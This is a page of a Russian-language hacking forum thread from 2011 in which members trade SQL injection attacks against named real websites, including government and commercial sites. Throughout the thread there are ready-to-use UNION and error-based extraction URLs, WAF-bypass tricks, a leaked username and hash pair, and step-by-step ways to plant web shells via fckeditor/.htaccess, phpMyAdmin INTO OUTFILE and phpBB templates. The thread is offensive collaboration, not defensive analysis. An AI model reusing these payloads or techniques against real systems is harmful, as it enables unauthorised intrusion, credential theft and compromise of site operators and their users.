PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 [76] 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

trololoman96
03.12.2011, 19:31
Есть такой вот фильтр


PHP:
$filter[3] = array("select","delete","union","update","insert","\\","'",",",";","--","-","%20","%27"," ","`","=","%");

$data=str_replace($filter[$op],"",strtolower($data) );



И есть запрос в бд в котором он обрабатывает объект


PHP:
$db->Query("SELECT * FROM admin WHERE login='".$this->adm_name."'");



Обойти select,union можно пробелом внутри, в качестве разделителя /**/, запятые тоже не проблема. Не получается обойти кавычку, можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...

KolosJey
03.12.2011, 19:39
trololoman96 said:
можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...


Ничего ты тут не сделаешь

UPD

Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )

trololoman96
03.12.2011, 20:10
Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку


PHP:
$sel=$db->Query("SELECT * FROM admin WHERE login='".$this->adm_name."'");



if (0NumRows($sel)) {

$this->adm_data=$db->FetchArray($sel);

if ($this->adm_data['password'] ==$this->adm_pass) {

$_SESSION['acplogin'] =$this->adm_data['login'];

$_SESSION['acppass'] =$this->adm_data['password'];

$this->redirect("admin.php");

} else {

$this->redirect("admin.php?err=pError");

}



все портит эта кавычка

SHADOW785
03.12.2011, 23:43
Vbulletin 4.1.7


Code:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='

Можно ли из этого что-то извлечь?

A_n_d_r_e_i
04.12.2011, 00:16
SHADOW785 said:
Vbulletin 4.1.7

Code:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='

Можно ли из этого что-то извлечь?


Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user

shadowrun
04.12.2011, 01:08
Code:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15+--+

Не шарю как вывести

Gorev
04.12.2011, 01:10
shadowrun said:

Code:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15+--+

Не шарю как вывести


http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

что вывести то?

shadowrun
04.12.2011, 01:13
Gorev said:
http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?


Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...

Gorev
04.12.2011, 01:15
shadowrun said:
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...



natasha:0444730b0844225c

что именно понять то?

shadowrun
04.12.2011, 01:20
Gorev said:
natasha:0444730b0844225c
что именно понять то?


бляяяя Я не увидел где оно выводит .

Gorev, спасибо!

shadowrun
04.12.2011, 02:13
Code:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34+--+



Найдено достаточно много товаров, пожалуйста уточните поисковый запрос

AnGeI
04.12.2011, 05:06
Code:
www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.

A_n_d_r_e_i
04.12.2011, 06:28
AnGeI said:

Code:
www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.


Иньекции нету

Ereee
04.12.2011, 08:48
AnGeI said:

Code:
www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.


A_n_d_r_e_i прав. Но не стоит опускать руки. Есть другие


HTML:
http://www.hbs-guu.ru/news3.html?item_id=-139+and+1=1+union+select+1,2,version(),4,5,6--+f

Unknown
04.12.2011, 14:51
Народ вот копался на 1м IPB форуме нашел там страничку с вот такими параметрами:


Code:
http://site.com/forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=forums&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_app_filters[core][sortKey]=date&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_tags=17&search_term=&sid=66bd76f74ed93a979f202dc202ec3fa4

На этой странице выдало:


Code:
Site.com Driver Error

There appears to be an error with the database.

If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.

You can try to refresh the page by clicking here

Может ли эта ошибка каким нибудь способом вести к Sql иньекции или еще чему нибудь?

lightangel
04.12.2011, 15:09
I have a problem here.


Code:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8



Code:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight

How do I execute?

BlooD_BASH
04.12.2011, 15:12
XSS

У меня такой нубский вопрос...

Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?

Ereee
04.12.2011, 16:05
shadowrun said:

Code:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34+--+



Бро, другой параметр пробуй


HTML:
http://www.hobbyshop.com.ua/goods.php?id=4766'-999.9+union+select+1,2,3,version(),5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5--+f

Melfis
04.12.2011, 17:16
BlooD_BASH said:
У меня такой нубский вопрос...
Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?


Политика безопасности браузеров. Для жс запрет на работу с фс.

wkar
04.12.2011, 19:28
Привет, помогите разобраться:

На сайте есть fckeditor 2.3.2, Заливаю шелл smile.php.gif > smile_php.gif и хтацес, в котором

SetHandler application/x-httpd-php

При заходе на шелл target.com/files/smile_php.gif его просто качает..

В чем проблема ?

Ereee
04.12.2011, 19:31
Попробуй залить .htaccess с содержанием:


PHP:
AddHandler application/x-httpd-php.gif

wkar
04.12.2011, 19:42
Ereee said:
Попробуй залить .htaccess с содержанием:

PHP:
AddHandler application/x-httpd-php.gif





Залил AddHandler application/x-httpd-php .php .html _php .png

smile.html(белая страница) i smile.png(изображение содержит ошибки..) не работают

При

AddType application/x-httpd-php .gif



Качает файл

Ereee
04.12.2011, 21:08
wkar, бывает, что на некоторых серверах этот способ не могает...

shadowrun
04.12.2011, 22:27
Code:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

union не нравится ему

er9j6@
04.12.2011, 23:37
shadowrun said:

Code:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

union не нравится ему


Крути блиндом, по-другому не выйдет

_http://onlinewatch24.com/search?search=&p=1&f=title+and%20mid(version(),1,1)=5+--+

A_n_d_r_e_i
05.12.2011, 00:31
lightangel said:
I have a problem here.

Code:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8


Code:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight

How do I execute?


Your request is blocking firewall on the server

In the case of a specific vulnerability in firewall, you can spend an injection. More about this http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf

lightangel
05.12.2011, 02:59
I need a solution to my problem here.


Code:
http://accesssys.net/product_details.php?pid=109%27+and+1=0+union+selec t+1,2,3,4+--+

It's showing this.

The used SELECT statements have a different number of columns

Any help please?

Skofield
05.12.2011, 03:08
lightangel

http://accesssys.net/solutions.php?sid=-100+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),user(),database()),10--

shell_c0de
05.12.2011, 03:10
2lightangel /thread43966.html ты уже ***

stan0009
05.12.2011, 20:52
Товарищи! Нужна ваша помощь!

короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:


Warning: include(fuck.php) [function.include]: failed to open stream: No such file or directory in fuck/fuck/fuck.php


подскажите вид уязвимости^^

а далее сам чего нибудь накручу

если не получится то конешно отдам вам на растерзание))

d1v
05.12.2011, 20:59
stan0009 said:
Товарищи! Нужна ваша помощь!
короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:
подскажите вид уязвимости^^
а далее сам чего нибудь накручу
если не получится то конешно отдам вам на растерзание))


/thread12123-including.html

/thread232773.html

но если ты тупо лазил, то уязвимости там скорее всего нет, просто ошибка подключения файла.

lightangel
05.12.2011, 21:56
Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+

Shows "Unknown column '4' in 'order clause'


Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+

Showing

406 Not Acceptable

This request is not acceptable

Also, another problem.


Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!



Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+

Nothing works!

Konqi
05.12.2011, 22:59
lightangel said:

Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+

Shows "Unknown column '4' in 'order clause'

Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+

Showing
406 Not Acceptable
This request is not acceptable
Also, another problem.

Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!


Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+

Nothing works!


http://www.mp3hungama.com/music/genre_albums.php?id=3+or+1+group+by+concat(version (),rand(0)|0)+%0A+having+%0A+min(0)--+

http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=1'+or+1+group+by+concat(version(), rand(0)|0)+having+min(0)--+

XAOCX
06.12.2011, 20:15
Что с этим можно сделать ?


Code:
http://???????.com/wp-content/themes/rttheme9/timthumb.php

Ereee
06.12.2011, 20:23
Гуглится легко:

/showpost.php?p=2792868&postcount=170

XAOCX
06.12.2011, 20:25
Ereee said:
Гуглится легко:
/showpost.php?p=2792868&postcount=170



Большое спасибо !

XAOCX
06.12.2011, 20:54
Что-то не получается, прошу помощи


Code:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php

aydin-ka
06.12.2011, 21:36
XAOCX said:
Что-то не получается, прошу помощи

Code:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php



Это не уязвимость

XAOCX
06.12.2011, 21:37
aydin-ka said:
Это не уязвимость


А как же это ?


Ereee said:
Гуглится легко:
/showpost.php?p=2792868&postcount=170

heks
06.12.2011, 23:06
нашел скулю на сайте и при выводе пароля пишет такую лабуду

skankjo:�{�o��

сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?


=3+and+1=0+Union+Select%20+1,UNHEX%28HEX%28concat_ ws%280x3a,username,password%29%29%29%20,3,4,5,6+fr om+tbl_users+limit+3,3%20--


сам запрос

A_n_d_r_e_i
07.12.2011, 03:16
XAOCX said:
А как же это ?


Там /wp-content/plugins/module/

а не /wp-content/themes/rttheme9/

WordPress TimThumb Plugin

попугай
07.12.2011, 04:49
heks said:
нашел скулю на сайте и при выводе пароля пишет такую лабуду
skankjo:�{�o��
сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?
сам запрос


это бинари, скорей всего или собственная схема хеширования.

Итальянской кодировки не бывает - есть кодировки, поддерживающие итальянский, они обычно встроены в браузер - вид->кодировка и выбираешь из списка.

sl1k
07.12.2011, 22:19
есть доступ к phpmyadmin на сервере, как можно залить шелл ?

XAOCX
07.12.2011, 22:19
Code:
http://www.onanistblog.ru/wp-content/plugins/nextgen-gallery

Не получается залить шелл

lightangel
07.12.2011, 22:22
Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2ERROR!



Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1Clean!

But Union Select does not work.


Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1

Gives error, any solution?

Konqi
07.12.2011, 22:24
lightangel said:

Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2ERROR!


Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1Clean!

But Union Select does not work.

Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1

Gives error, any solution?


http://www.kudosshowers.co.uk/gallery.php?id=-3+and+0+union+select+version()--+

Open the source

lightangel
07.12.2011, 22:28
Thanks a lot.


Code:


What about this?


Code:
http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+

lion-art
07.12.2011, 22:38
lightangel said:
Thanks a lot.

Code:


What about this?

Code:
http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+




http://hcpoa.com/readnews.php?id=1+or+1+group+by+concat(version(),f loor(rand(0)*2)%20)having+min(0)+or+1--+

Duplicate entry '3.23.581' for key 1

lightangel
07.12.2011, 22:43
Antichat has taught me so much now.

Thanks for the fix.

stan0009
08.12.2011, 17:56
Всем привет!)

товарищи, которые работают с sql injections.

посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(

vasykas
08.12.2011, 18:02
stan0009 said:
Всем привет!)
товарищи, которые работают с sql injections.
посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(


Дорк и далее

MySQLi мне оч помогает

ссыль не даю ( в л.с)

zenon3
08.12.2011, 19:15
Помогите разобраться

http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка

и

http://www.greenbergresearch.com/index.php?ID=1 тоже самое

никак не могу обойти фильтрацию

Ereee
08.12.2011, 19:45
zenon3 said:
Помогите разобраться
http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка
и
http://www.greenbergresearch.com/index.php?ID=1 тоже самое
никак не могу обойти фильтрацию




Code:
http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(he x(database())),14--+f

Warning: main(/var/www/html/inc/templates/greenbergdevDB): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(he x(user())),14--+f

Warning: main(/var/www/html/inc/templates/greenbergUser@localhost): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

Konqi
08.12.2011, 20:15
zenon3


http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка


тут мускул 3, поэтому ругается на обединение запросов

Skofield
08.12.2011, 21:16
sl1k said:
есть доступ к phpmyadmin на сервере, как можно залить шелл ?




Code:
CREATE TABLE `test_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `test_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `test_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `test_shell`

SergioBlog
08.12.2011, 23:22
Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки?

В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90

ну и пхп код сносит само собой

lightangel
09.12.2011, 02:35
help

I have a WAF problem..


Code:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+



Code:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+

But can't find vulnerable number!

Any help?

Konqi
09.12.2011, 02:40
lightangel said:
I have a WAF problem..

Code:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+


Code:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+

But can't find vulnerable number!
Any help?


http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+

lightangel

try to understand a principle of injection

no need to add a quote after vuln Parameter, if injection type is INTEGER, you'll just break the syntax

lightangel
09.12.2011, 02:44
Thanks. Is this site vulnerable?


Code:
http://www.vidol.gov/dol_news.php?page=-3'

And I did everything showing it's injectable.

Problem is, I tried error based, only brings this error.


Code:
http://www.vidol.gov/dol_news.php?errmsg=You+have+specified+an+invalid+ page+number.

Any help?

A_n_d_r_e_i
09.12.2011, 02:45
lightangel, read this article:

/thread104591.html

(about sql inj)

and this: /threadnav43966-1-10.html

Konqi
09.12.2011, 02:46
lightangel

it's not vuln

use logical expressions to check it, instead of "-"

попугай
09.12.2011, 02:57
SergioBlog said:
Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки?
В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
ну и пхп код сносит само собой


нет.

lightangel
09.12.2011, 04:08
Sorry for bringing back WAF topic.

I have read all articles on SQL Injection in antichat so don't think should be given again.


Code:
http://www.worldstyling.com/web/product_detail.php?id=-95/*!UnIoN+SeLeCt*/1,2,3,4,5+--+

Once I want to get union it tells Not Found, Not Found.

zenon3
09.12.2011, 04:09
www.allaboutjazz.com/php/article_archive.php'

как раскрутить? Использование пробелов в корне запрещено

www.allaboutjazz.com/php/article_archive.php'or(ExtractValue(1,concat(0x3a, version())))='1

пишет FUNCTION allaboutjazz.ExtractValue does not exist

какие еще могут быть варианты?

lightangel
09.12.2011, 04:10
Code:
http://www.worldstyling.com/web/product_detail.php?id=95/*!UnIoN!*/+/!*SeLeCt*!/1,2,3,4,5+--+

tried all WAF solution, nothing comes.

And also, checked souurce.

Konqi
09.12.2011, 04:37
lightangel said:

Code:
http://www.worldstyling.com/web/product_detail.php?id=95/*!UnIoN!*/+/!*SeLeCt*!/1,2,3,4,5+--+

tried all WAF solution, nothing comes.
And also, checked souurce.


http://www.worldstyling.com/web/product_detail.php?id=95'+or+1+group+by+concat_ws( 0x3a,version(),rand(0)|0)+having+min(0)--+

XAOCX
09.12.2011, 14:03
Народ, что это ?


Code:
http://foto4u.info/go.php?link=video&s=100&url=%0d%0a%20SomeCustomInjectedHeader%3ainjected_b y_wvs

Gorev
09.12.2011, 14:05
XAOCX said:
Народ, что это ?

Code:
http://foto4u.info/go.php?link=video&s=100&url=%0d%0a%20SomeCustomInjectedHeader%3ainjected_b y_wvs



acunetix

XAOCX
09.12.2011, 14:06
Gorev said:
acunetix


Что с этим можно сделать ?

Gorev
09.12.2011, 14:57
XAOCX said:
Что с этим можно сделать ?


SomeCustomInjectedHeader

переведи и подумай...

XAOCX
09.12.2011, 15:39
Gorev said:
SomeCustomInjectedHeader
переведи и подумай...



Шелл получится залить ?

qaz
09.12.2011, 15:56
PHP:
http://www.gospelmp3.ru/artists/?id=-39%27+union+select+1,2,3,4,5,6,column_name,8,9,10, 11,12,13+from+information_schema.columns+where+tab le_name=0x7061676573--+

Почему не выводит колонки?? (вывод дполжен быть в титле)

trololoman96
09.12.2011, 17:14
Похоже на то что where фильтруется, можешь попорбывать крутить так:


Code:
http://www.gospelmp3.ru/news/?id=-115+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,ta ble_name,column_name%29,9,10,11,12,13,14,15+from+i nformation_schema.columns+limit+1,1--&n_action=read

перебирая лимит пока не найдешь то что нужно, руками конечно муторно но думаю накидать скриптик который сдампит структуру не проблема.

DyukiN
09.12.2011, 20:38
есть досьуп к админке на движке phpbb, могу править шаблоны, как залить туда шелл?? какой код вставить?

sl1k
09.12.2011, 20:43
Откройте Администраторский раздел => Общие => Безопасность

Разрешите php в шаблонах и сохраните настройки

Откройте Администраторский раздел => Стили => Шаблоны

Напортив активного шаблона нажмите "Изменить"

Выберите файл шаблона, в который хотите вставить php, например "overall_footer.html"

В нужное место вставьте

DyukiN
09.12.2011, 20:58
как то криво все встает, и допустим я закачаю шелл потом на форум и гдде он будет лежать?

Gorev
10.12.2011, 00:02
DyukiN said:
как то криво все встает, и допустим я закачаю шелл потом на форум и гдде он будет лежать?


правь шаблон фака..на форуме он будет forum.com/faq.php

Faaax
10.12.2011, 03:53
Code:
http://eafangames.com/live_score_tennis.php/flash_games_online.php
?channel=76'%00 order by 1--

в чём проблемма не могу понять!подскажите!

DyukiN
10.12.2011, 10:06
Gorev said:
правь шаблон фака..на форуме он будет forum.com/faq.php


Я правил его, тоже ничего не получается(( дайте пжл мне пшп код в пм)

trololoman96
10.12.2011, 16:18
Faaax said:

Code:
http://eafangames.com/live_score_tennis.php/flash_games_online.php
?channel=76'%00 order by 1--

в чём проблемма не могу понять!подскажите!




Code:
http://eafangames.com/live_score_tennis.php/flash_games_online.php?channel=76'%29+union+select +@@version--%201#inscore_ifheight_xdc_500

Done!

qaz
10.12.2011, 18:13
Подскажите, почему не выводит данные из таблицы?


PHP:
http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select +email+from+acc_users+limit+12,1%29,floor%28rand%2 80%29*2%29%29having+min%280%29+or+1--+#

qaz
10.12.2011, 18:31
o'clock said:
File_Priv from mysql.user
через вывод естественно


а если мне пишет что

SELECT command denied to user 'блаблабла'@'localhost' for table 'user'

ет чё значит?

Skofield
10.12.2011, 20:41
qaz said:
а если мне пишет что
SELECT command denied to user 'блаблабла'@'localhost' for table 'user'
ет чё значит?


значит у данного юзера нет прав для доступа к таблице user.

Пользуйтесь переводчиком!

qaz
10.12.2011, 22:42
Подскажите, почему не выводит данные из таблицы?


PHP:
http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select +email+from+acc_users+limit+12,1%29,floor%28rand%2 80%29*2%29%29having+min%280%29+or+1--+#

BigBear
10.12.2011, 23:34
qaz said:
Подскажите, почему не выводит данные из таблицы?

PHP:
http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select +email+from+acc_users+limit+12,1%29,floor%28rand%2 80%29*2%29%29having+min%280%29+or+1--+#





Используй конструкцию cast as char


Code:
http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(* ),concat((select+(select+(select+table_name+from+i nformation_schema.tables+where+table_schema=0x656C 636B6965765F6272616E63685F31+limit+11,1))+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+1=1

http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(* ),concat((select+(select+(select+cast(acc_users.em ail+as+char)+from+elckiev_branch_1.acc_users+limit +8,1)+)+from+information_schema.tables+limit+0,1), floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)+and+1=1

~EviL~
11.12.2011, 03:18
Вот нашел уязвимость:


Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?

stepashka_
11.12.2011, 14:24
~EviL~ said:
Вот нашел уязвимость:

Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?


Это не уязвимость

er9j6@
11.12.2011, 15:03
~EviL~ said:
Вот нашел уязвимость:

Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?


так сделай


http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-21308+union+select+1,2,3,4,5,6,7,(select(@x)from(s elect(@x:=0x00),(select(null)from(information_sche ma.columns)where(table_schema!=0x696e666f726d61746 96f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c 62723e,table_schema,0x2e,table_name,0x3a,column_na me))))x),9,10,11,12,13,14,15,16,17,18,19,20+--+

t3cHn0iD
11.12.2011, 23:20
Если вбить кавычку в пост-параметр, то вылазит ошибка вида


HTML:
Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')

конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ?

Чакэ
12.12.2011, 00:13
t3cHn0iD said:
Если вбить кавычку в пост-параметр, то вылазит ошибка вида

HTML:
Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')

конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ?


в уязвимый параметр пиши select lol from troll и смотри результат выборки в анкете, или от чего это инфа. подзапрос же, ну ты понел..

er9j6@
12.12.2011, 01:04
Загрузил через load_file httpd.conf и не могу найти путь к сайту. Где он тут прописан?

Web Server: Apache/2.2.15 (Linux/SUSE)


Code:
# /etc/apache2/httpd.conf
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See for detailed information about
# the directives.

# Based upon the default apache configuration file that ships with apache,
# which is based upon the NCSA server configuration files originally by Rob
# McCool. This file was knocked together by Peter Poeml .

# If possible, avoid changes to this file. It does mainly contain Include
# statements and global settings that can/should be overridden in the
# configuration of your virtual hosts.

# Quickstart guide:
# http://en.opensuse.org/Apache_Quickstart_HOWTO

# Overview of include files, chronologically:
#
# httpd.conf
# |
# |-- uid.conf . . . . . . . . . . . . . . UserID/GroupID to run under
# |-- server-tuning.conf . . . . . . . . . sizing of the server (how many processes to start, ...)
# |-- sysconfig.d/loadmodule.conf . . . . . load these modules
# |-- listen.conf . . . . . . . . . . . . . IP adresses / ports to listen on
# |-- mod_log_config.conf . . . . . . . . . define logging formats
# |-- sysconfig.d/global.conf . . . . . . . server-wide general settings
# |-- mod_status.conf . . . . . . . . . . . restrict access to mod_status (server monitoring)
# |-- mod_info.conf . . . . . . . . . . . . restrict access to mod_info
# |-- mod_usertrack.conf . . . . . . . . . defaults for cookie-based user tracking
# |-- mod_autoindex-defaults.conf . . . . . defaults for displaying of server-generated directory listings
# |-- mod_mime-defaults.conf . . . . . . . defaults for mod_mime configuration
# |-- errors.conf . . . . . . . . . . . . . customize error responses
# |-- ssl-global.conf . . . . . . . . . . . SSL conf that applies to default server _and all_ virtual hosts
# |
# |-- default-server.conf . . . . . . . . . set up the default server that replies to non-virtual-host requests
# | |--mod_userdir.conf . . . . . . . . enable UserDir (if mod_userdir is loaded)
# | `--conf.d/apache2-manual?conf . . . add the docs ('?' = if installed)
# |
# |-- sysconfig.d/include.conf . . . . . . your include files
# | (for each file to be included here, put its name
# | into APACHE_INCLUDE_* in /etc/sysconfig/apache2)
# |
# `-- . . . . . . . . . . . . . . for each virtual host, place one file here
# `-- *.conf . . . . . . . . . . . . . (*.conf is automatically included)
#
#
# Files marked are created from sysconfig upon server restart: instead of
# these files, you edit /etc/sysconfig/apache2

# Filesystem layout:
#
# /etc/apache2/
# |-- charset.conv . . . . . . . . . . . . for mod_auth_ldap
# |-- conf.d/
# | |-- apache2-manual.conf . . . . . . . conf that comes with apache2-doc
# | |-- mod_php4.conf . . . . . . . . . . (example) conf that comes with apache2-mod_php4
# | `-- ... . . . . . . . . . . . . . . . other configuration added by packages
# |-- /etc/apache2/
# |-- errors.conf
# |-- httpd.conf . . . . . . . . . . . . . top level configuration file
# |-- listen.conf
# |-- magic
# |-- mime.types -> ../mime.types
# |-- mod_autoindex-defaults.conf
# |-- mod_info.conf
# |-- mod_log_config.conf
# |-- mod_mime-defaults.conf
# |-- mod_perl-startup.pl
# |-- mod_status.conf
# |-- mod_userdir.conf
# |-- mod_usertrack.conf
# |-- server-tuning.conf
# |-- ssl-global.conf
# |-- ssl.crl/ . . . . . . . . . . . . . . PEM-encoded X.509 Certificate Revocation Lists (CRL)
# |-- ssl.crt/ . . . . . . . . . . . . . . PEM-encoded X.509 Certificates
# |-- ssl.csr/ . . . . . . . . . . . . . . PEM-encoded X.509 Certificate Signing Requests
# |-- ssl.key/ . . . . . . . . . . . . . . PEM-encoded RSA Private Keys
# |-- ssl.prm/ . . . . . . . . . . . . . . public DSA Parameter Files
# |-- sysconfig.d/ . . . . . . . . . . . . files that are created from /etc/sysconfig/apache2
# | |-- global.conf
# | |-- include.conf
# | `-- loadmodule.conf
# |-- uid.conf
